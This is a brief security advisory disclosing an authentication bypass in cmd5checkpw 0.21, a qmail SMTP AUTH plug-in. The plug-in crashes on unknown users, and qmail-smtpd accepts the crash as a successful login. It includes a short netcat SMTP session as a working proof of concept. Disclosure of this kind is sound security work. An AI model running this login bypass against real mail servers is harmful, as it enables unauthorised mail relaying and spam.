Authentication failure in cmd5checkpw 0.21

[Javier Kohen <jkohen () TOUGH COM>]

Program: cmd5checkpw
Vulnerable versions: 0.21 (probably earlier, too.)
Fixed versions: 0.22
URI: http://freshmeat.net/projects/cmd5checkpw/
Author: Elysium deeZine <http://www.elysium.pl/>

Description:
This program works as an authentication plug-in for a patch of the same author to add SMTP AUTH support to QMail. I 
found that if it was fed with a non-existing user name, it would segfault due to the lack of checking for the 
(imprabable?) reason of such an invalid input. The exploit here comes from the consecuence of this problem; the caller 
-in this case the patched qmail-smtpd - would take its child crashing as a successful authentication, thus validating 
the session. This brings an open door for spam.
Even though this utility was fixed, the vulnerability in the patch to qmail-smtpd still remains, leaving the door 
opened to further bugs in the authentication plug-ins.

Proof of concept:
$ nc localhost smtp
< 220 ns.foo.com.ar ESMTP
> ehlo spammer.net
< 250-ns.foo.com.ar
< 250-AUTH=LOGIN CRAM-MD5 PLAIN
< 250-AUTH LOGIN CRAM-MD5 PLAIN
< 250-PIPELINING
< 250 8BITMIME
> auth plain
< 334 ok. go on.
> xyzzy<NUL>nopasswordneeded<NUL>
< ??? ok.

-- 
Javier Kohen <jkohen () tough com>
ICQ #2361802 [blashyrkh]
http://www.tough.com.ar/

Attachment: _bin
Description: